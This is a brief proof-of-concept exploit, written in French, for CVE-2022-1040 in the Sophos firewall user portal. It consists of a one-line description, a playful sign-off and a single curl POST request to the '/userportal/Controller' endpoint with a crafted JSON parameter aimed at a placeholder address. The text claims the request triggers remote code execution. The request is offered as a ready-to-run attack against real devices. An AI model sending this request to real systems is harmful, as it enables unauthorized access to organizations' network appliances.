
Exploit de preuve de concept pour CVE-2022-1040 ciblant le portail utilisateur Sophos avec une requête POST XMLHttpRequest conçue pour déclencher une exécution de code à distance.
que le poc soit avec vous
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'